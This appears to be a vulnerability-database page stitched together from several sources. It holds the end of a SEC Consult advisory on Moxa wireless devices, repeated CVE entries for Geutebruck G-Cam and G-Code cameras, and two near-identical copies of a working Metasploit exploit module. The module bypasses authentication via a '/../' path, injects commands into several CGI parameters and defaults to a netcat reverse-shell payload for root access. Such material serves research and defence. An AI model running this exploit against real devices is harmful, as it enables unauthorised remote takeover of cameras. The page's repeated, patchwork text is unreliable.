The gethostbyname buffer overflow vulnerability (GHOST) was checked with the
help of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was
compiled and executed on the emulated device to test the system.
4) Multiple Outdated Software Components
The IoT Inspector recognized multiple outdated software components with known
vulnerabilities:
BusyBox        1.18.5    06/2011
Dropbear SSH   2011.54   11/2011
GNU glibc      2.9       02/2009
Linux Kernel   2.6.27    10/2008
OpenSSL        0.9.7g    04/2005   (only found in the program "iw_director")
OpenSSL        1.0.0     03/2010
Vulnerable / tested versions:
-----------------------------
The following firmware versions for various devices have been identified
to be vulnerable:
* WAC-2004 / 1.7
* WAC-1001 / 2.1
* WAC-1001-T / 2.1
* OnCell G3470A-LTE-EU / 1.7
* OnCell G3470A-LTE-EU-T / 1.7
* TAP-323-EU-CT-T / 1.3
* TAP-323-US-CT-T / 1.3
* TAP-323-JP-CT-T / 1.3
* WDR-3124A-EU / 2.3
* WDR-3124A-EU-T / 2.3
* WDR-3124A-US / 2.3
* WDR-3124A-US-T / 2.3
Vendor contact timeline:
------------------------
2020-10-09: Contacting vendor through moxa.csrt@moxa.com.
2020-10-12: Contact sends PGP key for encrypted communication and asks for the
detailed advisory. Sent encrypted advisory to vendor.
2020-11-06: Status update from vendor regarding technical analysis. Vendor
requested more time for fixing the vulnerabilities as more products
are affected.
2020-11-09: Granted more time for fixing to vendor.
2020-11-10: Vendor asked for next steps regarding the advisory publication.
2020-11-11: Asked vendor for an estimation when a public disclosure is possible.
2020-11-16: Vendor responded that the product team can give rough feedback.
2020-11-25: Asked for a status update.
2020-11-25: Vendor responded that the investigation is not done yet.
2020-12-14: Vendor provided a list of potentially affected devices and stated
            that the full investigation may take until January 2021 due to the
            list of CVEs that were provided with the appended IoT Inspector
            report. The patches may be available by June 2021.
2020-12-15: Shifted the next status update round with the vendor to May 2021.
2020-12-23: Vendor provided full list of affected devices.
2021-02-05: Vendor manually sifted through the issues found in 4) and provided
            a full list of confirmed vulnerabilities. WAC-2004 was phased out
            in 2019.
2021-02-21: Confirmed receipt of the vulnerability list, next status update in
            May 2021.
2021-06-10: Asked for an update.
2021-06-15: Vendor stated that the update will be provided in the next days.
2021-06-21: Vendor will give an update next week as Covid gets worse in
            Taiwan.
2021-06-23: Vendor stated that patches are under development and that more
            time is needed to finish them.
2021-06-24: Set release date to 2021-09-01.
2021-07-02: Vendor provides status updates.
2021-08-16: Vendor provides status updates.
2021-08-17: Vendor asks for CVE IDs and states that WDR-3124A has been phased
            out.
2021-08-20: Sent assigned CVE-IDs to vendor. Asked for fixed version numbers.
2021-08-31: Vendor provides fixed firmware version numbers and the advisory
links.
2021-09-01: Coordinated release of security advisory.
Solution:
---------
According to the vendor, the following fixed firmware versions must be applied
to resolve the issues:
* WAC-1001 / 2.1.5
* WAC-1001-T / 2.1.5
* OnCell G3470A-LTE-EU / 1.7.4
* OnCell G3470A-LTE-EU-T / 1.7.4
* TAP-323-EU-CT-T / 1.8.1
* TAP-323-US-CT-T / 1.8.1
* TAP-323-JP-CT-T / 1.8.1
Moxa Technical Support must be contacted to request the security patches.
The corresponding security advisories for the affected devices are available on
the vendor's website:
TAP-323/WAC-1001/WAC-2004
https://www.moxa.com/en/support/product-support/security-advisory/tap-323-wac-1001-2004-wireless-ap-bridge-client-vulnerabilities
OnCell G3470A-LTE/WDR-3124A
https://www.moxa.com/en/support/product-support/security-advisory/oncell-g3470a-wdr-3124a-cellular-gateways-router-vulnerabilities
The following device models are EOL and should be replaced:
* WAC-2004
* WDR-3124A-EU
* WDR-3124A-EU-T
* WDR-3124A-US
* WDR-3124A-US-T
Workaround:
-----------
None.
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Thomas Weber / @2021
| VAR-202109-0860 | CVE-2021-33551 | Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code |
CVSS V2: 6.5 CVSS V3: 7.2 Severity: HIGH |
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code provided by GEUTEBRUCK:
* Lack of authentication for important features (CWE-306) - CVE-2021-33543
* Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549
The expected impact depends on each vulnerability, but may include the following:
* Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543
* Arbitrary code executed by a remote third party via command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545
* A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546
* A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547
* A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Geutebruck Multiple Remote Command Execution',
        'Description' => %q{
          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder
          and exploits multiple authenticated arbitrary command execution vulnerabilities within
          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,
          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as
          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in
          remote code execution as the root user.
        },
        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          ['URL', 'http://geutebruck.com'],
          ['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          ['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
  end

  def firmware
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/brand.xml'
    )
    unless res
      print_error('Connection failed!')
      return false
    end
    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end
    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
  end

  def check
    version = firmware
    if version == false
      return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
    end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    print_status("#{rhost}:#{rport} - Setting up request...")
    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end

    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end

    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
  end
end
| VAR-202109-0858 | CVE-2021-33549 | Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code |
CVSS V2: 6.5 CVSS V3: 7.2 Severity: HIGH |
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code provided by GEUTEBRUCK:
* Lack of authentication for important features (CWE-306) - CVE-2021-33543
* Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549
The expected impact depends on each vulnerability.
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
| VAR-202109-0859 | CVE-2021-33550 | Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code |
CVSS V2: 6.5 CVSS V3: 7.2 Severity: HIGH |
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code provided by GEUTEBRUCK:
* Lack of authentication for important features (CWE-306) - CVE-2021-33543
* Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549
The expected impact depends on each vulnerability, but may include the following:
* Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543
* Arbitrary code executed by a remote third party via command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545
* A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546
* A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547
* A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.
| VAR-202109-0857 | CVE-2021-33548 | Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code |
CVSS V2: 6.5 CVSS V3: 7.2 Severity: HIGH |
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code provided by GEUTEBRUCK:
* Lack of authentication for important features (CWE-306) - CVE-2021-33543
* Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549
The expected impact depends on each vulnerability, but may include the following:
* Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543
* Arbitrary code executed by a remote third party via command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545
* A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546
* A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547
* A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.
| VAR-202109-0850 | CVE-2021-33554 | Multiple vulnerabilities in GEUTEBRUCK G-Cam E2 and G-Code |
CVSS V2: 6.5 CVSS V3: 7.2 Severity: HIGH |
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code provided by GEUTEBRUCK:
* Lack of authentication for important features (CWE-306) - CVE-2021-33543
* Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549
The expected impact depends on each vulnerability, but may include the following:
* Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543
* Arbitrary code executed by a remote third party via command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545
* A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546
* A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547
* A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Geutebruck Multiple Remote Command Execution',
        'Description' => %q{
          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder
          and exploits multiple authenticated arbitrary command execution vulnerabilities within
          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,
          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as
          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in
          remote code execution as the root user.
        },
        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          ['URL', 'http://geutebruck.com'],
          ['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          ['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        # One target per injectable CGI under /uapi-cgi/. PLACEHOLDER_CMD is replaced
        # by the payload in exploit(); the leading '/../' in every URI is the path
        # that sidesteps the basic-auth rule protecting the folder (CVE-2021-33543).
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            # testcmd.cgi executes the 'command' value directly, so no $(...) wrapper is needed.
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
  end

  # Fetch the unauthenticated /brand.xml and extract the version string from its
  # <firmware> element. Returns the version string, or false on any failure.
  def firmware
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/brand.xml'
    )
    unless res
      print_error('Connection failed!')
      return false
    end
    if res.body.nil? || res.body.empty?
      print_error('Empty body in the response!')
      return false
    end

    res_xml = res.get_xml_document
    firmware_node = res_xml.at('//firmware')
    if firmware_node.nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end

    version = firmware_node.text.to_s.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
    if version
      version[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but it is not a valid version string!')
      false
    end
  end

  def check
    version = firmware
    if version == false
      return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
    end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    # Affected: every release up to and including 1.12.0.27, plus the two later
    # builds 1.12.13.2 and 1.12.14.5 that are still vulnerable.
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    print_status("#{rhost}:#{rport} - Setting up request...")
    method = target['http_method']
    http_method_vars = method == 'GET' ? 'vars_get' : 'vars_post'

    # Substitute the payload into the injectable parameter. A copy is built rather
    # than editing target['http_vars'] in place, so the placeholder is still there
    # if the module is run again against another host in the same session.
    http_vars = target['http_vars'].transform_values do |v|
      v.include?('PLACEHOLDER_CMD') ? v.sub('PLACEHOLDER_CMD', payload.encoded) : v
    end

    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      'method' => method,
      'uri' => target['uri'],
      http_method_vars => http_vars
    )
    print_status('Exploit complete, you should get a shell as the root user!')
  end
end